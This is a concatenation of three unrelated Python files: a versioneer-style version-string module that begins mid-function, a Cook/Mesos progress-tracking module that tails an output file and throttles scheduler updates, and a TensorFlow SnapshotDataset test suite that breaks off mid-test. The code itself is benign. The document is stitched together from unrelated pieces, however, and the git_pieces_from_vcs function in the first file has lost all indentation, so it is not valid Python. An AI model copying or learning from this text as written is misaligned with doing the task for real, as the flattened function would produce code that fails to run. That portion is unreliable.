        # Either we're using git < 1.8.3, or there really are no tags. We use
        # a heuristic: assume all version tags have a digit. The old git %d
        # expansion behaves like git log --decorate=short and strips out the
        # refs/heads/ and refs/tags/ prefixes that would let us distinguish
        # between branches and tags. By ignoring refnames without digits, we
        # filter out many common branch names like "release" and
        # "stabilization", as well as "HEAD" and "master".
        tags = set([r for r in refs if re.search(r"\d", r)])
        if verbose:
            print("discarding '%s', no digits" % ",".join(refs - tags))
    if verbose:
        print("likely tags: %s" % ",".join(sorted(tags)))
    for ref in sorted(tags):
        # sorting will prefer e.g. "2.0" over "2.0rc1"
        if ref.startswith(tag_prefix):
            r = ref[len(tag_prefix) :]
            if verbose:
                print("picking %s" % r)
            return {
                "version": r,
                "full-revisionid": keywords["full"].strip(),
                "dirty": False,
                "error": None,
                "date": date,
            }
    # no suitable tags, so version is "0+unknown", but full hex is still there
    if verbose:
        print("no suitable tags, using unknown + full revision id")
    return {
        "version": "0+unknown",
        "full-revisionid": keywords["full"].strip(),
        "dirty": False,
        "error": "no suitable tags",
        "date": None,
    }
@register_vcs_handler("git", "pieces_from_vcs")
def git_pieces_from_vcs(tag_prefix, root, verbose, run_command=run_command):
"""Get version from 'git describe' in the root of the source tree.
This only gets called if the git-archive 'subst' keywords were *not*
expanded, and _version.py hasn't already been rewritten with a short
version string, meaning we're inside a checked out source tree.
"""
GITS = ["git"]
if sys.platform == "win32":
GITS = ["git.cmd", "git.exe"]
out, rc = run_command(GITS, ["rev-parse", "--git-dir"], cwd=root, hide_stderr=True)
if rc != 0:
if verbose:
print("Directory %s not under git control" % root)
raise NotThisMethod("'git rev-parse --git-dir' returned error")
# if there is a tag matching tag_prefix, this yields TAG-NUM-gHEX[-dirty]
# if there isn't one, this yields HEX[-dirty] (no NUM)
describe_out, rc = run_command(
GITS,
[
"describe",
"--tags",
"--dirty",
"--always",
"--long",
"--match",
"%s*" % tag_prefix,
],
cwd=root,
)
# --long was added in git-1.5.5
if describe_out is None:
raise NotThisMethod("'git describe' failed")
describe_out = describe_out.strip()
full_out, rc = run_command(GITS, ["rev-parse", "HEAD"], cwd=root)
if full_out is None:
raise NotThisMethod("'git rev-parse' failed")
full_out = full_out.strip()
pieces = {}
pieces["long"] = full_out
pieces["short"] = full_out[:7] # maybe improved later
pieces["error"] = None
# parse describe_out. It will be like TAG-NUM-gHEX[-dirty] or HEX[-dirty]
# TAG might have hyphens.
git_describe = describe_out
# look for -dirty suffix
dirty = git_describe.endswith("-dirty")
pieces["dirty"] = dirty
if dirty:
git_describe = git_describe[: git_describe.rindex("-dirty")]
# now we have TAG-NUM-gHEX or HEX
if "-" in git_describe:
# TAG-NUM-gHEX
mo = re.search(r"^(.+)-(\d+)-g([0-9a-f]+)$", git_describe)
if not mo:
# unparseable. Maybe git-describe is misbehaving?
pieces["error"] = "unable to parse git-describe output: '%s'" % describe_out
return pieces
# tag
full_tag = mo.group(1)
if not full_tag.startswith(tag_prefix):
if verbose:
fmt = "tag '%s' doesn't start with prefix '%s'"
print(fmt % (full_tag, tag_prefix))
pieces["error"] = "tag '%s' doesn't start with prefix '%s'" % (
full_tag,
tag_prefix,
)
return pieces
pieces["closest-tag"] = full_tag[len(tag_prefix) :]
# distance: number of commits since tag
pieces["distance"] = int(mo.group(2))
# commit: short hex revision ID
pieces["short"] = mo.group(3)
else:
# HEX: no tags
pieces["closest-tag"] = None
count_out, rc = run_command(GITS, ["rev-list", "HEAD", "--count"], cwd=root)
pieces["distance"] = int(count_out) # total number of commits
# commit date: see ISO-8601 comment in git_versions_from_keywords()
date = run_command(GITS, ["show", "-s", "--format=%ci", "HEAD"], cwd=root)[
0
].strip()
pieces["date"] = date.strip().replace(" ", "T", 1).replace(" ", "", 1)
return pieces
def plus_or_dot(pieces):
    """Return a + if we don't already have one, else return a ."""
    return "." if "+" in pieces.get("closest-tag", "") else "+"


def render_pep440(pieces):
    """Build up version string, with post-release "local version identifier".

    Our goal: TAG[+DISTANCE.gHEX[.dirty]] . Note that if you
    get a tagged build and then dirty it, you'll get TAG+0.gHEX.dirty

    Exceptions:
    1: no tags. git_describe was just HEX. 0+untagged.DISTANCE.gHEX[.dirty]
    """
    tag = pieces["closest-tag"]
    if not tag:
        # exception #1: no tag to anchor on, synthesize a "0" base version
        version = "0+untagged.%d.g%s" % (pieces["distance"], pieces["short"])
        if pieces["dirty"]:
            version += ".dirty"
        return version
    version = tag
    if pieces["distance"] or pieces["dirty"]:
        version += plus_or_dot(pieces)
        version += "%d.g%s" % (pieces["distance"], pieces["short"])
        if pieces["dirty"]:
            version += ".dirty"
    return version


def render_pep440_pre(pieces):
    """TAG[.post.devDISTANCE] -- No -dirty.

    Exceptions:
    1: no tags. 0.post.devDISTANCE
    """
    tag = pieces["closest-tag"]
    if not tag:
        # exception #1
        return "0.post.dev%d" % pieces["distance"]
    if pieces["distance"]:
        return "%s.post.dev%d" % (tag, pieces["distance"])
    return tag


def render_pep440_post(pieces):
    """TAG[.postDISTANCE[.dev0]+gHEX] .

    The ".dev0" means dirty. Note that .dev0 sorts backwards
    (a dirty tree will appear "older" than the corresponding clean one),
    but you shouldn't be releasing software with -dirty anyways.

    Exceptions:
    1: no tags. 0.postDISTANCE[.dev0]
    """
    tag = pieces["closest-tag"]
    if tag:
        version = tag
        if pieces["distance"] or pieces["dirty"]:
            version += ".post%d" % pieces["distance"]
            if pieces["dirty"]:
                version += ".dev0"
            version += plus_or_dot(pieces)
            version += "g%s" % pieces["short"]
        return version
    # exception #1
    version = "0.post%d" % pieces["distance"]
    if pieces["dirty"]:
        version += ".dev0"
    return version + "+g%s" % pieces["short"]
def render_pep440_old(pieces):
    """TAG[.postDISTANCE[.dev0]] .

    The ".dev0" means dirty.

    Exceptions:
    1: no tags. 0.postDISTANCE[.dev0]
    """
    tag = pieces["closest-tag"]
    # a dirty tree is marked with a trailing ".dev0"
    dev_marker = ".dev0" if pieces["dirty"] else ""
    if not tag:
        # exception #1
        return "0.post%d%s" % (pieces["distance"], dev_marker)
    if pieces["distance"] or pieces["dirty"]:
        return "%s.post%d%s" % (tag, pieces["distance"], dev_marker)
    return tag
def render_git_describe(pieces):
    """TAG[-DISTANCE-gHEX][-dirty].

    Like 'git describe --tags --dirty --always'.

    Exceptions:
    1: no tags. HEX[-dirty] (note: no 'g' prefix)
    """
    tag = pieces["closest-tag"]
    if tag:
        # distance of zero means we're exactly on the tag: no suffix
        rendered = tag
        if pieces["distance"]:
            rendered = "%s-%d-g%s" % (tag, pieces["distance"], pieces["short"])
    else:
        # exception #1: bare hex revision
        rendered = pieces["short"]
    return rendered + "-dirty" if pieces["dirty"] else rendered
def render_git_describe_long(pieces):
    """TAG-DISTANCE-gHEX[-dirty].

    Like 'git describe --tags --dirty --always -long'.
    The distance/hash is unconditional.

    Exceptions:
    1: no tags. HEX[-dirty] (note: no 'g' prefix)
    """
    tag = pieces["closest-tag"]
    if tag:
        # unlike render_git_describe, always emit distance and hash
        base = "%s-%d-g%s" % (tag, pieces["distance"], pieces["short"])
    else:
        # exception #1: bare hex revision
        base = pieces["short"]
    return base + "-dirty" if pieces["dirty"] else base
def render(pieces, style):
    """Render the given version pieces into the requested style."""
    if pieces["error"]:
        # parsing failed upstream; propagate the error verbatim
        return {
            "version": "unknown",
            "full-revisionid": pieces.get("long"),
            "dirty": None,
            "error": pieces["error"],
            "date": None,
        }
    if not style or style == "default":
        style = "pep440"  # the default
    # dispatch table instead of an if/elif chain
    renderers = {
        "pep440": render_pep440,
        "pep440-pre": render_pep440_pre,
        "pep440-post": render_pep440_post,
        "pep440-old": render_pep440_old,
        "git-describe": render_git_describe,
        "git-describe-long": render_git_describe_long,
    }
    if style not in renderers:
        raise ValueError("unknown style '%s'" % style)
    return {
        "version": renderers[style](pieces),
        "full-revisionid": pieces["long"],
        "dirty": pieces["dirty"],
        "error": None,
        "date": pieces.get("date"),
    }
def get_versions():
    """Get version information or return default if unable to do so."""
    # I am in _version.py, which lives at ROOT/VERSIONFILE_SOURCE. If we have
    # __file__, we can work backwards from there to the root. Some
    # py2exe/bbfreeze/non-CPython implementations don't do __file__, in which
    # case we can only use expanded keywords.
    def _unknown_version(reason):
        # Common shape of the "could not determine a version" result.
        return {
            "version": "0+unknown",
            "full-revisionid": None,
            "dirty": None,
            "error": reason,
            "date": None,
        }
    cfg = get_config()
    verbose = cfg.verbose
    # First choice: expanded git-archive keywords.
    try:
        return git_versions_from_keywords(get_keywords(), cfg.tag_prefix, verbose)
    except NotThisMethod:
        pass
    # Locate the source-tree root by walking up from this file.
    try:
        root = os.path.realpath(__file__)
        # versionfile_source is the relative path from the top of the source
        # tree (where the .git directory might live) to this file. Invert
        # this to find the root from __file__.
        for _ in cfg.versionfile_source.split("/"):
            root = os.path.dirname(root)
    except NameError:
        # __file__ is unavailable (e.g. frozen interpreters).
        return _unknown_version("unable to find root of source tree")
    # Second choice: ask git itself via `git describe`.
    try:
        return render(git_pieces_from_vcs(cfg.tag_prefix, root, verbose), cfg.style)
    except NotThisMethod:
        pass
    # Last resort: infer the version from the parent directory name.
    try:
        if cfg.parentdir_prefix:
            return versions_from_parentdir(cfg.parentdir_prefix, root, verbose)
    except NotThisMethod:
        pass
    return _unknown_version("unable to compute version")
| |
import json
import logging
import time
from threading import Event, Lock, Thread
import os
import re
import cook
class ProgressUpdater(object):
    """This class is responsible for sending progress updates to the scheduler.
    It throttles the rate at which progress updates are sent.
    """
    def __init__(self, driver, task_id, max_message_length, poll_interval_ms, send_message_fn):
        """
        driver: MesosExecutorDriver
            The mesos driver to use.
        task_id: string
            The task id.
        max_message_length: int
            The allowed max message length after encoding.
        poll_interval_ms: int
            The interval after which to send a subsequent progress update.
        send_message: function(driver, message, max_message_length)
            The helper function used to send the message.
        """
        self.driver = driver
        self.task_id = task_id
        self.max_message_length = max_message_length
        self.poll_interval_ms = poll_interval_ms
        # time.time() of the last update actually sent; None until the first send
        self.last_reported_time = None
        # last payload sent, used to suppress duplicate consecutive updates
        self.last_progress_data = None
        self.send_message = send_message_fn
        # serializes send_progress_update() calls from concurrent threads
        self.lock = Lock()
    def has_enough_time_elapsed_since_last_update(self):
        """Returns true if enough time (based on poll_interval_ms) has elapsed since
        the last progress update (available in last_reported_time).
        """
        if self.last_reported_time is None:
            # nothing has been sent yet, so the first update is always allowed
            return True
        else:
            current_time = time.time()
            time_diff_ms = (current_time - self.last_reported_time) * 1000
            return time_diff_ms >= self.poll_interval_ms
    def send_progress_update(self, progress_data, force_send=False):
        """Sends a progress update if enough time has elapsed since the last progress update.
        The force_send flag can be used to ignore the check for enough time having elapsed.
        Using this method is thread-safe.
        Parameters
        ----------
        progress_data: map
            The progress data to send.
        force_send: boolean, optional
            Defaults to false.
        Returns
        -------
        Nothing
        """
        with self.lock:
            # skip None payloads and exact duplicates of the last sent update
            if progress_data is not None and self.last_progress_data != progress_data:
                if force_send or self.has_enough_time_elapsed_since_last_update():
                    logging.info('Sending progress message {}'.format(progress_data))
                    # copy so the caller's dict is not mutated by the task-id injection
                    message_dict = dict(progress_data)
                    message_dict['task-id'] = self.task_id
                    progress_message = json.dumps(message_dict)
                    # NOTE(review): the limit is checked in characters, not encoded
                    # bytes, although the __init__ docstring says "after encoding"
                    # -- confirm callers pass a character-based limit.
                    if len(progress_message) > self.max_message_length and cook.PROGRESS_MESSAGE_KEY in message_dict:
                        progress_str = message_dict[cook.PROGRESS_MESSAGE_KEY]
                        num_extra_chars = len(progress_message) - self.max_message_length
                        # the extra 3 chars leave room for the '...' ellipsis suffix
                        allowed_progress_message_length = max(len(progress_str) - num_extra_chars - 3, 0)
                        new_progress_str = progress_str[:allowed_progress_message_length].strip() + '...'
                        logging.info('Progress message trimmed to {}'.format(new_progress_str))
                        message_dict[cook.PROGRESS_MESSAGE_KEY] = new_progress_str
                        progress_message = json.dumps(message_dict)
                    self.send_message(self.driver, progress_message, self.max_message_length)
                    self.last_reported_time = time.time()
                    self.last_progress_data = progress_data
                else:
                    logging.debug('Not sending progress data as enough time has not elapsed since last update')
class ProgressWatcher(object):
    """This class tails the output from the target file listening for progress messages.
    The retrieve_progress_states generates all progress messages iteratively.
    """
    @staticmethod
    def match_progress_update(progress_regex_str, input_string):
        """Returns the progress tuple when the input string matches the provided regex.
        Parameters
        ----------
        progress_regex_str: string
            The progress regex to match against, it must return two capture groups.
        input_string: string
            The input string.
        Returns
        -------
        the tuple (percent, message) if the string matches the provided regex,
        else return None.
        """
        matches = re.findall(progress_regex_str, input_string)
        # only the first match on a line is reported; later matches are ignored
        return matches[0] if len(matches) >= 1 else None
    def __init__(self, config, stop_signal, task_completed_signal):
        # path of the file to tail for progress messages
        self.target_file = config.progress_output_name
        # regex with two capture groups: (percent, message)
        self.progress_regex_string = config.progress_regex_string
        # most recently parsed progress dict; None until the first match
        self.progress = None
        # Event signalling an external request to stop tailing (e.g. task kill)
        self.stop_signal = stop_signal
        # Event signalling that the task has finished producing output
        self.task_completed_signal = task_completed_signal
        # bounds a single readline() so unbounded lines cannot exhaust memory
        self.max_bytes_read_per_line = config.max_bytes_read_per_line
    def current_progress(self):
        """Returns the current progress dictionary."""
        return self.progress
    def tail(self, sleep_time_ms):
        """This method incrementally generates lines from a file by waiting for new content from a file.
        It behaves like the 'tail -f' shell command.
        Parameters
        ----------
        sleep_time_ms: int
            The unit of time in ms to repetitively sleep when the file has not been created or no new
            content is available in the file being tailed.
        Returns
        -------
        an incrementally generated list of lines in the file being tailed.
        """
        try:
            sleep_param = sleep_time_ms / 1000
            # wait for the file to appear (or for the task to finish without creating it)
            while not os.path.isfile(self.target_file) and not self.task_completed_signal.is_set():
                logging.debug('{} has not yet been created, sleeping {} ms'.format(self.target_file, sleep_time_ms))
                time.sleep(sleep_param)
            if self.stop_signal.is_set():
                logging.info('No output has been read to parse progress messages')
                return
            logging.info('{} has been created, reading contents'.format(self.target_file))
            # use a context manager so the file handle is closed even when the
            # generator is abandoned or an error occurs (it was previously leaked)
            with open(self.target_file, 'r') as target_file_obj:
                while not self.stop_signal.is_set():
                    line = target_file_obj.readline(self.max_bytes_read_per_line)
                    if not line:
                        # exit if program has completed and there are no more lines to read
                        if self.task_completed_signal.is_set():
                            logging.info('Done processing file for progress messages')
                            break
                        # no new line available, sleep before trying again
                        time.sleep(sleep_param)
                        continue
                    yield line
            if self.stop_signal.is_set() and not self.task_completed_signal.is_set():
                logging.info('Task requested to be killed, may not have processed all progress messages')
        except Exception:
            # narrowed from a bare `except:` so KeyboardInterrupt/SystemExit and
            # the generator's own GeneratorExit are no longer swallowed here
            logging.exception('Error while tailing {}'.format(self.target_file))
    def retrieve_progress_states(self):
        """Generates the progress states by tailing the target_file.
        It tails a target file (using the tail() method) and uses the provided
        regex to find a match for a progress message. The regex is expected to
        generate two components in the match: the progress percent as an int and
        a progress message string. When such a message is found, this method
        yields the current progress as a dictionary.
        Returns
        -------
        an incrementally generated list of progress states.
        """
        # without a regex there is nothing to parse, so yield nothing
        if self.progress_regex_string:
            sleep_time_ms = 50
            for line in self.tail(sleep_time_ms):
                progress_report = ProgressWatcher.match_progress_update(self.progress_regex_string, line)
                if progress_report is not None:
                    percent, message = progress_report
                    logging.info('Updating progress to {} percent, message: {}'.format(percent, message))
                    self.progress = {cook.PROGRESS_MESSAGE_KEY: message.strip(), 'progress-percent': int(percent)}
                    yield self.progress
def track_progress(progress_watcher, progress_complete_event, send_progress_update):
    """Sends progress updates to the mesos driver until the stop_signal is set.
    Parameters
    ----------
    progress_watcher: ProgressWatcher
        The progress watcher which maintains the current progress state
    progress_complete_event: Event
        Event that triggers completion of progress tracking
    send_progress_update: function(current_progress)
        The function to invoke while sending progress updates
    Returns
    -------
    Nothing.
    """
    try:
        for current_progress in progress_watcher.retrieve_progress_states():
            logging.debug('Latest progress: {}'.format(current_progress))
            send_progress_update(current_progress)
    except Exception:
        # narrowed from a bare `except:` so SystemExit/KeyboardInterrupt are
        # not silently swallowed inside the tracker thread
        logging.exception('Exception while tracking progress')
    finally:
        # always signal completion so waiters do not hang on a failed tracker
        progress_complete_event.set()
def launch_progress_tracker(progress_watcher, progress_updater):
    """Launches the threads that track progress and send progress updates to the driver.
    Parameters
    ----------
    progress_watcher: ProgressWatcher
        The progress watcher which maintains the current progress state.
    progress_updater: ProgressUpdater
        The progress updater which sends progress updates to the scheduler.
    Returns
    -------
    The progress complete threading.Event.
    """
    completion_event = Event()
    # the tracker thread drains the watcher and pushes updates via the updater
    tracker_thread = Thread(
        target=track_progress,
        args=(progress_watcher, completion_event, progress_updater.send_progress_update))
    tracker_thread.start()
    return completion_event
def force_send_progress_update(progress_watcher, progress_updater):
    """Retrieves the latest progress message and attempts to force send it to the scheduler.
    Parameters
    ----------
    progress_watcher: ProgressWatcher
        The progress watcher which maintains the current progress state.
    progress_updater: ProgressUpdater
        The progress updater which sends progress updates to the scheduler.
    Returns
    -------
    Nothing.
    """
    # bypass the updater's throttling so the final state always goes out
    progress_updater.send_progress_update(progress_watcher.current_progress(), force_send=True)
| |
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the `SnapshotDataset` transformation."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import time
from absl.testing import parameterized
from tensorflow.python.data.experimental.kernel_tests import reader_dataset_ops_test_base
from tensorflow.python.data.experimental.ops import snapshot
from tensorflow.python.data.kernel_tests import test_base
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.data.ops import readers as core_readers
from tensorflow.python.framework import combinations
from tensorflow.python.ops import gen_array_ops
from tensorflow.python.ops import string_ops
from tensorflow.python.platform import test
class SnapshotDatasetTest(reader_dataset_ops_test_base.TFRecordDatasetTestBase,
                          parameterized.TestCase):
  """Tests for the experimental `snapshot` dataset transformation.
  Covers snapshot writing (single- and multi-threaded, multiple
  compressions), reading snapshots back after the source TFRecord files
  are deleted, fingerprinting of logically-identical pipelines, shard
  sizing, and pending-snapshot expiry.
  """
  def setUp(self):
    # NOTE(review): relies on the base class's setUp creating
    # self.test_filenames before removeTFRecords runs -- confirm.
    super(SnapshotDatasetTest, self).setUp()
    self.removeTFRecords()
  def removeTFRecords(self):
    # Delete the source TFRecord files so subsequent reads can only be
    # satisfied from the snapshot on disk.
    for filename in self.test_filenames:
      os.remove(filename)
    self.test_filenames = []
  def setUpTFRecord(self, num_files=10, num_records=10):
    # (Re)create the TFRecord fixture files with the requested shape.
    self._num_files = num_files
    self._num_records = num_records
    self.test_filenames = self._createFiles()
  def makeSnapshotDirectory(self):
    # Fresh, empty directory for the snapshot under the test's temp dir.
    tmpdir = self.get_temp_dir()
    tmpdir = os.path.join(tmpdir, "snapshot")
    os.mkdir(tmpdir)
    return tmpdir
  def assertSnapshotDirectoryContains(
      self, directory, num_fingerprints, num_runs_per_fp, num_snapshot_files):
    """Asserts the on-disk snapshot layout: one directory per pipeline
    fingerprint, each containing `num_runs_per_fp` run directories plus a
    snapshot.metadata file, each run holding `num_snapshot_files` shards
    named NNNNNNNN.snapshot.
    """
    dirlist_raw = os.listdir(directory)
    dirlist = []
    # Ignore the graphdef pbtxts we write for debugging purposes.
    for i in range(len(dirlist_raw)):
      if not dirlist_raw[i].endswith("-graph.pbtxt"):
        dirlist.append(dirlist_raw[i])
    self.assertLen(dirlist, num_fingerprints)
    for i in range(num_fingerprints):
      fingerprint_dir = os.path.join(directory, dirlist[i])
      fingerprint_dir_list = sorted(os.listdir(fingerprint_dir))
      # +1 accounts for the snapshot.metadata file alongside the run dirs
      self.assertLen(fingerprint_dir_list, num_runs_per_fp + 1)
      self.assertEqual(fingerprint_dir_list[num_runs_per_fp],
                       "snapshot.metadata")
      for j in range(num_runs_per_fp):
        run_dir = os.path.join(fingerprint_dir, fingerprint_dir_list[j])
        run_dirlist = sorted(os.listdir(run_dir))
        self.assertLen(run_dirlist, num_snapshot_files)
        file_counter = 0
        for filename in run_dirlist:
          # shard files are numbered sequentially from zero
          self.assertEqual(filename, "%08d.snapshot" % file_counter)
          file_counter += 1
  @combinations.generate(test_base.default_test_combinations())
  def testWriteDifferentPipelinesInOneDirectory(self):
    # Two different pipelines should produce two fingerprint directories.
    tmpdir = self.makeSnapshotDirectory()
    dataset = dataset_ops.Dataset.range(1000)
    dataset = dataset.apply(snapshot.snapshot(tmpdir))
    self.assertDatasetProduces(dataset, list(range(1000)))
    dataset = dataset_ops.Dataset.range(1001)
    dataset = dataset.apply(snapshot.snapshot(tmpdir))
    self.assertDatasetProduces(dataset, list(range(1001)))
    self.assertSnapshotDirectoryContains(tmpdir, 2, 1, 1)
  @combinations.generate(test_base.default_test_combinations())
  def testWriteSnapshotMultipleSimultaneous(self):
    # Two identical pipelines race to write the same snapshot.
    tmpdir = self.makeSnapshotDirectory()
    dataset1 = dataset_ops.Dataset.range(1000)
    dataset1 = dataset1.apply(snapshot.snapshot(tmpdir))
    next1 = self.getNext(dataset1)
    dataset2 = dataset_ops.Dataset.range(1000)
    dataset2 = dataset2.apply(snapshot.snapshot(tmpdir))
    next2 = self.getNext(dataset2)
    for _ in range(1000):
      self.evaluate(next1())
      self.evaluate(next2())
    # we check that only one copy of the metadata has been written, and the
    # one that lost the race would be in passthrough mode.
    self.assertSnapshotDirectoryContains(tmpdir, 1, 1, 1)
  @combinations.generate(test_base.default_test_combinations())
  def testGetNextCreatesDir(self):
    tmpdir = self.makeSnapshotDirectory()
    # We create two iterators but call getNext on only one.
    dataset1 = dataset_ops.Dataset.range(1000)
    dataset1 = dataset1.apply(snapshot.snapshot(tmpdir))
    next1 = self.getNext(dataset1)
    dataset2 = dataset_ops.Dataset.range(1001)
    dataset2 = dataset2.apply(snapshot.snapshot(tmpdir))
    _ = self.getNext(dataset2)
    for _ in range(1000):
      self.evaluate(next1())
    # We check that only one directory is created.
    self.assertSnapshotDirectoryContains(tmpdir, 1, 1, 1)
  @combinations.generate(
      combinations.times(
          test_base.default_test_combinations(),
          combinations.combine(compression=[
              snapshot.COMPRESSION_NONE, snapshot.COMPRESSION_GZIP,
              snapshot.COMPRESSION_SNAPPY
          ])))
  def testWriteSnapshotSimpleSuccessful(self, compression):
    # Basic write path for each supported compression codec.
    tmpdir = self.makeSnapshotDirectory()
    dataset = dataset_ops.Dataset.range(1000)
    dataset = dataset.apply(snapshot.snapshot(tmpdir, compression=compression))
    self.assertDatasetProduces(dataset, list(range(1000)))
    self.assertSnapshotDirectoryContains(tmpdir, 1, 1, 1)
  @combinations.generate(test_base.default_test_combinations())
  def testWriteSnapshotRepeatAfterwards(self):
    # repeat() after snapshot() must not multiply the on-disk data.
    tmpdir = self.makeSnapshotDirectory()
    dataset = dataset_ops.Dataset.range(10)
    dataset = dataset.apply(snapshot.snapshot(tmpdir))
    dataset = dataset.repeat(10)
    self.assertDatasetProduces(dataset, list(range(10)) * 10)
    self.assertSnapshotDirectoryContains(tmpdir, 1, 1, 1)
  @combinations.generate(
      combinations.times(
          test_base.default_test_combinations(),
          combinations.combine(compression=[
              snapshot.COMPRESSION_NONE, snapshot.COMPRESSION_GZIP,
              snapshot.COMPRESSION_SNAPPY
          ])))
  def testReadSnapshotBackAfterWrite(self, compression):
    self.setUpTFRecord()
    filenames = self.test_filenames
    expected = [
        b"Record %d of file %d" % (r, f)  # pylint:disable=g-complex-comprehension
        for f in range(0, 10)
        for r in range(0, 10)
    ]
    tmpdir = self.makeSnapshotDirectory()
    dataset = core_readers._TFRecordDataset(filenames)
    dataset = dataset.apply(snapshot.snapshot(tmpdir, compression=compression))
    self.assertDatasetProduces(dataset, expected)
    # remove the original files and try to read the data back only from snapshot
    self.removeTFRecords()
    dataset2 = core_readers._TFRecordDataset(filenames)
    dataset2 = dataset2.apply(snapshot.snapshot(
        tmpdir, compression=compression))
    self.assertDatasetProduces(dataset2, expected)
  @combinations.generate(test_base.default_test_combinations())
  def testReadShuffledSnapshotAfterWrite(self):
    # shuffle_on_read should reorder elements but preserve the full set.
    self.setUpTFRecord(num_files=10, num_records=50)
    filenames = self.test_filenames
    expected = [
        b"Record %d of file %d" % (r, f)  # pylint:disable=g-complex-comprehension
        for f in range(0, 10)
        for r in range(0, 50)
    ]
    tmpdir = self.makeSnapshotDirectory()
    dataset = core_readers._TFRecordDataset(filenames)
    # small shard size forces multiple shards so shuffling is observable
    dataset = dataset.apply(snapshot.snapshot(tmpdir, shard_size_bytes=10))
    self.assertDatasetProduces(dataset, expected)
    # remove the original files and try to read the data back only from snapshot
    self.removeTFRecords()
    dataset2 = core_readers._TFRecordDataset(filenames)
    dataset2 = dataset2.apply(snapshot.snapshot(tmpdir, shuffle_on_read=True))
    next2 = self.getNext(dataset2)
    res1 = self.evaluate(next2())
    res2 = self.evaluate(next2())
    res3 = self.evaluate(next2())
    res4 = self.evaluate(next2())
    res5 = self.evaluate(next2())
    # make sure that we don't read the file back in the same order.
    self.assertNotEqual([res1, res2, res3, res4, res5], expected[0:5])
    # make sure all the elements are still there
    dataset3 = core_readers._TFRecordDataset(filenames)
    dataset3 = dataset3.apply(snapshot.snapshot(tmpdir, shuffle_on_read=True))
    self.assertDatasetProduces(dataset3, expected, assert_items_equal=True)
  @combinations.generate(test_base.default_test_combinations())
  def testReadSnapshotParallelAfterWrite(self):
    # Multi-threaded reads may reorder elements, hence assert_items_equal.
    self.setUpTFRecord(10, 4000)
    filenames = self.test_filenames
    expected = [
        b"Record %d of file %d" % (r, f)  # pylint:disable=g-complex-comprehension
        for f in range(0, 10)
        for r in range(0, 4000)
    ]
    tmpdir = self.makeSnapshotDirectory()
    dataset = core_readers._TFRecordDataset(filenames)
    dataset = dataset.apply(
        snapshot.snapshot(
            tmpdir,
            shard_size_bytes=1024 * 1024,
            num_reader_threads=2,
            reader_buffer_size=10))
    self.assertDatasetProduces(dataset, expected, assert_items_equal=True)
    # remove the original files and try to read the data back only from
    # snapshot.
    self.removeTFRecords()
    dataset2 = core_readers._TFRecordDataset(filenames)
    dataset2 = dataset2.apply(
        snapshot.snapshot(
            tmpdir,
            shard_size_bytes=1024 * 1024,
            num_reader_threads=2,
            reader_buffer_size=10))
    self.assertDatasetProduces(dataset2, expected, assert_items_equal=True)
  # Not testing Snappy here because Snappy reads currently require a lot of
  # memory.
  @combinations.generate(
      combinations.times(
          test_base.default_test_combinations(),
          combinations.times(
              combinations.combine(compression=[
                  snapshot.COMPRESSION_NONE, snapshot.COMPRESSION_GZIP
              ]),
              combinations.combine(threads=2, size=[1, 2]) +
              combinations.combine(threads=8, size=[1, 4, 8]))))
  def testReadSnapshotBackAfterMultiThreadedWrite(
      self, compression, threads, size):
    self.setUpTFRecord()
    filenames = self.test_filenames
    expected = [
        b"Record %d of file %d" % (r, f)  # pylint:disable=g-complex-comprehension
        for f in range(0, 10)
        for r in range(0, 10)
    ]
    tmpdir = self.makeSnapshotDirectory()
    dataset = core_readers._TFRecordDataset(filenames)
    dataset = dataset.apply(
        snapshot.snapshot(
            tmpdir,
            compression=compression,
            num_writer_threads=threads,
            writer_buffer_size=size))
    self.assertDatasetProduces(dataset, expected)
    # remove the original files and try to read the data back only from
    # snapshot
    self.removeTFRecords()
    dataset2 = core_readers._TFRecordDataset(filenames)
    dataset2 = dataset2.apply(
        snapshot.snapshot(tmpdir, compression=compression))
    self.assertDatasetProduces(dataset2, expected, assert_items_equal=True)
  @combinations.generate(test_base.default_test_combinations())
  def testSameFingerprintWithDifferentInitializationOrder(self):
    # Logically identical pipelines built in different orders must hash to
    # the same fingerprint (one fingerprint directory).
    tmpdir = self.makeSnapshotDirectory()
    dataset1 = dataset_ops.Dataset.range(0, 100)
    dataset2 = dataset_ops.Dataset.range(100, 200)
    dataset3 = dataset_ops.Dataset.range(200, 300)
    dataset = dataset1.concatenate(dataset2).concatenate(dataset3)
    dataset = dataset.apply(snapshot.snapshot(tmpdir))
    self.assertDatasetProduces(dataset, list(range(300)))
    dataset4 = dataset_ops.Dataset.range(200, 300)
    dataset5 = dataset_ops.Dataset.range(100, 200)
    dataset6 = dataset_ops.Dataset.range(0, 100)
    dataset = dataset6.concatenate(dataset5).concatenate(dataset4)
    dataset = dataset.apply(snapshot.snapshot(tmpdir))
    self.assertDatasetProduces(dataset, list(range(300)))
    self.assertSnapshotDirectoryContains(tmpdir, 1, 1, 1)
  @combinations.generate(test_base.default_test_combinations())
  def testExpiredSnapshotRewrite(self):
    tmpdir = self.makeSnapshotDirectory()
    dataset1 = dataset_ops.Dataset.range(1000)
    dataset1 = dataset1.apply(
        snapshot.snapshot(tmpdir, pending_snapshot_expiry_seconds=1))
    next1 = self.getNext(dataset1)
    # Don't finish reading dataset1, so it is never finalized
    for _ in range(500):
      self.evaluate(next1())
    self.assertSnapshotDirectoryContains(tmpdir, 1, 1, 1)
    time.sleep(2)
    # Creating dataset2 after we run through dataset1 due to eager mode, where
    # the snapshot state is determined immediately upon dataset creation. We
    # only want to determine the snapshot state for dataset2 after the first
    # snapshot has expired.
    dataset2 = dataset_ops.Dataset.range(1000)
    dataset2 = dataset2.apply(
        snapshot.snapshot(tmpdir, pending_snapshot_expiry_seconds=1))
    next2 = self.getNext(dataset2)
    for _ in range(500):
      self.evaluate(next2())
    # second run directory appears under the same fingerprint
    self.assertSnapshotDirectoryContains(tmpdir, 1, 2, 1)
  @combinations.generate(test_base.default_test_combinations())
  def testSpecifyShardSize(self):
    # 10 x 4MB elements with 10MB shards should produce 4 shard files.
    tmpdir = self.makeSnapshotDirectory()
